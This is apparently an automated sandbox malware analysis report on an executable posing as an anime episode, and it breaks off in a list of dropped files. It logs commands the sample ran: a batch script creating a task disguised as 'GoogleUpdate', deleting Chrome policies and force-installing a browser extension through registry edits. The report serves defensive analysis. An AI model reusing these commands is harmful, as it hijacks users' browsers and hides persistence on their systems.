Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeProcess created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe "C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{E9871BE9-995B-4EFF-BA27-126D1FC36700} {ED4F63C9-39F6-4A7D-A76D-4B8F059F42ED} 5372
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=1008 -burn.embedded BurnPipe.{652D427C-3FCF-4F57-9B0A-0FFBCA2578FC} {CF7111B3-FF83-47BF-A56D-0E99B89A84C1} 5468
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" -burn.filehandle.attached=588 -burn.filehandle.self=564 /quiet /burn.log.append "C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20230102153454.log" /install
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.filehandle.attached=540 -burn.filehandle.self=564 -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=1008 -burn.embedded BurnPipe.{652D427C-3FCF-4F57-9B0A-0FFBCA2578FC} {CF7111B3-FF83-47BF-A56D-0E99B89A84C1} 5468
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{DC57C196-DCD2-4148-818F-F83AAF0E5C46} {63FE371D-956D-4D2B-988F-00929D1EE668} 2140
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=900 -burn.embedded BurnPipe.{8ADE75BE-8C64-4D11-B05A-A6C78AECD63F} {6EE058D7-D097-43E8-87F0-A357D97D5238} 1324
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.filehandle.attached=576 -burn.filehandle.self=572 -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=900 -burn.embedded BurnPipe.{8ADE75BE-8C64-4D11-B05A-A6C78AECD63F} {6EE058D7-D097-43E8-87F0-A357D97D5238} 1324
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\WindowsApp\chrome.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Local\WindowsApp\reg.xml" /tn GoogleUpdate
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\Policies\Google\Chrome /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d dbffglanhdhedkjkijpkplhpcdndpchj /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj" /v "path" /t REG_SZ /d "C:\Users\user\AppData\Local\WindowsApp\apps-helper\apps.crx" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj" /v "version" /t REG_SZ /d 1.0 /f
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe Code function: 4_2_000515CB InitializeSecurityDescriptor,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,SetEntriesInAclA,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,CoInitializeSecurity,LocalFree
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe Code function: 4_2_0005393B AllocateAndInitializeSid,CheckTokenMembership
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe Queries volume information: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\logo.png VolumeInformation
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\Windows\System32\vcruntime140.dll VolumeInformation
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\Windows\System32\msvcp140.dll VolumeInformation
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe Queries volume information: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\logo.png VolumeInformation
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe Queries volume information: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\logo.png VolumeInformation
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe Queries volume information: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\logo.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe Code function: 4_2_0003E9A7 cpuid
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe Code function: 4_2_00024CE8 ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CloseHandle,LocalFree
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe Code function: 4_2_0004FDC2 EnterCriticalSection,GetCurrentProcessId,GetCurrentThreadId,GetLocalTime,LeaveCriticalSection
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe Code function: 4_2_00058733 GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe Code function: 4_2_0001508D GetModuleHandleW,CoInitializeEx,GetVersionExW,GetLastError,CoUninitialize
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe Code function: 4_2_000160BA GetUserNameW,GetLastError
Initial Access: 1 Replication Through Removable Media; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: 1 Scripting; 1 Native API; 213 Command and Scripting Interpreter; 1 Scheduled Task/Job; 1 Service Execution; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell
Persistence: 1 DLL Side-Loading; 1 DLL Search Order Hijacking; 2 Windows Service; 1 Scheduled Task/Job; Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron
Privilege Escalation: 1 DLL Side-Loading; 1 DLL Search Order Hijacking; 1 Access Token Manipulation; 2 Windows Service; 12 Process Injection; 1 Scheduled Task/Job; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron
Defense Evasion: 11 Deobfuscate/Decode Files or Information; 1 Scripting; 2 Obfuscated Files or Information; 1 Timestomp; 1 DLL Side-Loading; 1 DLL Search Order Hijacking; 1 File Deletion; 23 Masquerading; 1 Modify Registry; 1 Access Token Manipulation; 12 Process Injection
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: 12 System Time Discovery; 11 Peripheral Device Discovery; 1 Account Discovery; 3 File and Directory Discovery; 36 System Information Discovery; 21 Security Software Discovery; 11 Process Discovery; 3 System Owner/User Discovery; System Network Connections Discovery; Process Discovery; Permission Groups Discovery
Lateral Movement: 1 Replication Through Removable Media; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol; Exfiltration Over Physical Medium
Command and Control: 2 Encrypted Channel; 1 Non-Application Layer Protocol; 1 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact; Service Stop
[Behavior graph image not reproduced. Behavior Graph ID: 776910; Sample: Boku no Hero Academia 6th S...; Startdate: 02/01/2023; Architecture: WINDOWS; Score: 26]

Source | Detection | Scanner | Label | Link
Boku no Hero Academia 6th Season - Episode 13.exe | 4% | ReversingLabs | |
Boku no Hero Academia 6th Season - Episode 13.exe | 5% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link | Download
3.3.Boku no Hero Academia 6th Season - Episode 13.tmp.4ea0000.0.unpack | 100% | Avira | HEUR/AGEN.1252364 | | Download File
No Antivirus matches
Name | Malicious | Antivirus Detection | Reputation
https://smashbrowser.com/welcome3.php | false | | unknown
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://appsyndication.org/2006/appsynVC_redist.x64.exefalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://smash.com2Boku no Hero Academia 6th Season - Episode 13.tmp, 00000001.00000003.253560445.00000000025E4000.00000004.00001000.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.407483126.00000000024F4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://smashbrowser.com/welcome2.phpBoku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.408105135.0000000000A81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  No contacted IP infos
                                                  Joe Sandbox Version:36.0.0 Rainbow Opal
                                                  Analysis ID:776910
                                                  Start date and time:2023-01-02 15:33:42 +01:00
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 12m 1s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Sample file name:Boku no Hero Academia 6th Season - Episode 13.exe
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:45
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:1
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:SUS
                                                  Classification:sus26.winEXE@73/269@12/0
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HDC Information:
                                                  • Successful, ratio: 99.9% (good quality ratio 92.3%)
                                                  • Quality average: 71.3%
                                                  • Quality standard deviation: 31.2%
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 141
                                                  • Number of non-executed functions: 260
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, SgrmBroker.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 142.250.203.99, 34.104.35.123
                                                  • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, edgedl.me.gvt1.com, ctldl.windowsupdate.com, clientservices.googleapis.com, cdn.onenote.net
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                  • Report size getting too big, too many NtWriteFile calls found.
Time | Type | Description
15:35:01 | Autostart | Run: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce {d4cecf3b-b68f-4995-8840-52ea0fab646e} "C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" /burn.runonce
15:35:42 | Task Scheduler | Run new task: GoogleUpdate path: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe
                                                  No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                  No context
                                                  No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
3cd707.rbf (copy) | file.exe | Get hash | malicious | Browse |
 | file.exe | Get hash | malicious | Browse |
 | file.exe | Get hash | malicious | Browse |
 | file.exe | Get hash | malicious | Browse |
 | WiGui.exe | Get hash | malicious | Browse |
 | file.exe | Get hash | malicious | Browse |
 | file.exe | Get hash | malicious | Browse |
 | file.exe | Get hash | malicious | Browse |
 | file.exe | Get hash | malicious | Browse |
 | file.exe | Get hash | malicious | Browse |
 | file.exe | Get hash | malicious | Browse |
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):49488
                                                                        Entropy (8bit):6.652691609629867
                                                                        Encrypted:false
                                                                        SSDEEP:768:8EgYXUcHJcUJSDW/tfxL1qBS3hO6nb/TEHEXi9zufUKQXi9zug:8vGS8fZ1eUpreA+zuTc+zug
                                                                        MD5:BBA9680BC310D8D25E97B12463196C92
                                                                        SHA1:9A480C0CF9D377A4CAEDD4EA60E90FA79001F03A
                                                                        SHA-256:E0B66601CC28ECB171C3D4B7AC690C667F47DA6B6183BFF80604C84C00D265AB
                                                                        SHA-512:1575C786AC3324B17057255488DA5F0BC13AD943AC9383656BAF98DB64D4EC6E453230DE4CD26B535CE7E8B7D41A9F2D3F569A0EFF5A84AEB1C2F9D6E3429739
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Joe Sandbox View:
                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                        • Filename: WiGui.exe, Detection: malicious, Browse
                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):35664
                                                                        Entropy (8bit):6.593060494290354
                                                                        Encrypted:false
                                                                        SSDEEP:384:s1vZLstUQjOoKFYVWcM5gW9EutSt+ed8QtR9z//glxyeHRN7vk58QtR9z//gpjYw:spCtzjOjKGkHUQP9zHK3QP9zK
                                                                        MD5:C385EBC3A83D842489021E48E23BC925
                                                                        SHA1:0A992ABB2E424DA981196EDB280E7821F2033D9F
                                                                        SHA-256:8E49A6D937EE6AC20D949629B54E28CAF01AEF312BC7184063280346B35899E3
                                                                        SHA-512:85CC4C9FBEACDDC934D46D907354C1FE93DC62B1BAD7A6CCDB7C9101E820D01717E863FAB39DD6BC062F38A100F03D49EBE2B3905146BCEDFC6C014703D8C3B3
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):197456
                                                                        Entropy (8bit):6.635988442488691
                                                                        Encrypted:false
                                                                        SSDEEP:3072:emnW8UQ7ORW0cNFSCYzwUT1VUxwO1Mkz1wN6jAUjEgi8H0NpScUuhIW4Wbx:eEVP5FSCYbPUxKkEWShIo1
                                                                        MD5:4B27F209925C247252BABEFF90D6CD2A
                                                                        SHA1:709DC2E8A03A9F261C64ADF3F1C0839DE62DDF52
                                                                        SHA-256:25305353C51AC72F4646BD549493BECDBD6C997605F70C937E72CAD3F962182D
                                                                        SHA-512:30E8EF20EC13ABE50A13319159EB2BA1EBB117E1E4C438E24DE48331ACAB34D8AF3531E051CD93597EB5BEDE0AF81AE223A06DAA072FF226D79240FFFF68B7A6
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):414544
                                                                        Entropy (8bit):6.39872237716585
                                                                        Encrypted:false
                                                                        SSDEEP:6144:nmU5qgKJWj8R7V6JozBVgNSp8iC7PGirS7HLrOhMcvyUwUZOqz0iTx9a9T:maAJWj8xV6GdyNSp8iC7PGGS7POkBP
                                                                        MD5:7DBCAF6B03B97163731F391395406C4E
                                                                        SHA1:340CB672F4A80EC76D8B2E758E4E9880C66E8A3D
                                                                        SHA-256:33BFAF7EC048215B7CE55F61444A5361309BA01B73AD40C192FD647A676E63C3
                                                                        SHA-512:AF4679D5F39768DC8628F785FA19855E73D24710302861C51C9A115BFF97B4B4A17B01AE2E21ECC469528382B13805E5687459D8C86341C8B98DBC234C8AA880
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):191824
                                                                        Entropy (8bit):6.448531042380911
                                                                        Encrypted:false
                                                                        SSDEEP:3072:1BFc8DO8nun2cxR4nGP6A4zWBxgXkNe0IOdPctDksog9j+r/A/U:3Cp8nu1xRoVzACUg814a/H
                                                                        MD5:9312D1B8DF74830B285820276ECD5DDA
                                                                        SHA1:4CB1CBE8003EE4CD352AC37C44E958F7DD8CDECA
                                                                        SHA-256:CB721F775CDEE730D9D69EBD9E723C05A99EE1805F8D23A52A74FC015AA3D965
                                                                        SHA-512:C49415EBDE6B8B586D6CBDAD2CB4D8CDBC245CB681759918D37025652BAD288406AC9168C0C549C4ED9060AD5C5EBA025A4691014783B8CD38CE5A7B901DE9AE
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):327504
                                                                        Entropy (8bit):6.355017459054054
                                                                        Encrypted:false
                                                                        SSDEEP:6144:NVb1XM3VzY+Ug3yxpzrxIQVpJOWvYGCs8yFnWzghIGAu428z:jBc3VYZxxrxq9ze47z
                                                                        MD5:C11DC6779E2DC5A4620FBE1BF306D720
                                                                        SHA1:04DEA1CBBAB2A939578544056EB7818E9D7CD3CB
                                                                        SHA-256:0CE53545B7D6E1FE5451DF4822D3D59B6806C00D0C69C0813E7A4EFC2CF92A86
                                                                        SHA-512:C1E422E42825BBCDDD2E8A73204B23AEAEC2520E882B8583347B925A4695151998BA96798FDF68F2A5838B985FC230A3DCD254A8EAFC43704E6190A612992C6D
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):579920
                                                                        Entropy (8bit):6.52239950023068
                                                                        Encrypted:false
                                                                        SSDEEP:12288:LrkOYDWQRan8Rqpp8v4cTbu/nVfKgn+6aFoVmUPyGcNz+QEKZm+jWodEEVGmHHl:L1VmUqcQEKZm+jWodEEk4l
                                                                        MD5:0929E46B1020B372956F204F85E48ED6
                                                                        SHA1:9DC01CF3892406727C8DC7D12AD8855871C9EF09
                                                                        SHA-256:CB3C74D6FCC091F4EB7C67EE5EB5F76C1C973DEA8B1C6B851FCCA62C2A9D8AA8
                                                                        SHA-512:DD28FCA139D316E2CC4D13A6ADFFB7AF6F1A9DC1FC7297976A4D5103FAE44DE555A951B99F7601590B331F6DBB9BFC592D31980135E3858E265064117012C8D5
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):345936
                                                                        Entropy (8bit):6.045245777392109
                                                                        Encrypted:false
                                                                        SSDEEP:6144:MXkEvKJuQW9sR2Dr8NZrK6nVYDPE+kaCih8vev:ekEwhW9shn+Dc8hcI
                                                                        MD5:A767DDF1EAE2C38A59312D304C803BC0
                                                                        SHA1:5204A25FE8AF8C21DE3305966B6BB17043656168
                                                                        SHA-256:D7731A1DF856D0A19344FD0B80DADD4E4BE6B6136236FBA6543BB66C1F015E81
                                                                        SHA-512:4F892A698ECFEF06897747E47035768FB4F132B41C60FA26430CBC1F0C3608DE744FFF27B2CAE46114C1CE72BC6E58E3C4D1F8350D414AE16958CE21F89C1A9F
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):109392
                                                                        Entropy (8bit):6.643764685776923
                                                                        Encrypted:false
                                                                        SSDEEP:1536:DcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/Auecbq8qZU34zW/K0zD:DV3iC0h9q4v6XjKAuecbq8qGISb/
                                                                        MD5:870FEA4E961E2FBD00110D3783E529BE
                                                                        SHA1:A948E65C6F73D7DA4FFDE4E8533C098A00CC7311
                                                                        SHA-256:76FDB83FDE238226B5BEBAF3392EE562E2CB7CA8D3EF75983BF5F9D6C7119644
                                                                        SHA-512:0B636A3CDEFA343EB4CB228B391BB657B5B4C20DF62889CD1BE44C7BEE94FFAD6EC82DC4DB79949EDEF576BFF57867E0D084E0A597BF7BF5C8E4ED1268477E88
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):5625152
                                                                        Entropy (8bit):6.746793773162767
                                                                        Encrypted:false
                                                                        SSDEEP:49152:6ORAY4XUjURKpEaGKgTPiNHtkHqYF95zExbVLE1pf8s7CT1u+wvqPDne4vpR6uSz:prVpHqvKnfJeFLOAkGkzdnEVomFHKnPY
                                                                        MD5:A0372BFFC29E5FE5F07969154E713210
                                                                        SHA1:706AA77C117C8B1D8D510A5A29D05FCD1E33EA21
                                                                        SHA-256:0F0803E6355698D992AD257853577D60E064D55BF570B9B8B299315E8C6088E4
                                                                        SHA-512:0FE574C6B199C04F323EBF37D599A79F2A953AA3F1F19512679D7B5D0EFC18074CFDED54B6D762D019B8AA6134FA60342793C53D42250A9750B7563AF3B4A88A
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):51016
                                                                        Entropy (8bit):6.301194450733097
                                                                        Encrypted:false
                                                                        SSDEEP:768:jdzvsXMQ9tLkr8yTby97DVL4HdRmuU9z1kKXRmuU9z7NT:hz0XMQ9tLU8CbyBVLS3d8z1bBd8z79
                                                                        MD5:F048B2C27FB6B2E1C076A29978CF1B95
                                                                        SHA1:D3CF168D1D0C707F4B73063AB0883B0981FE7E4E
                                                                        SHA-256:6DCE3907366FF863B06AEBE3B6D15B660E021E202982C8ACD92BBBF76BEB59A1
                                                                        SHA-512:37A6090C1BC1D2136E8C5FD265438025970CC048837B148F62AE7236A0B100058CB646957E9E74A60C0A08187DFC9526C4F3359376056CFFEAB7FBFE3087EFBC
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):51024
                                                                        Entropy (8bit):6.340536874095089
                                                                        Encrypted:false
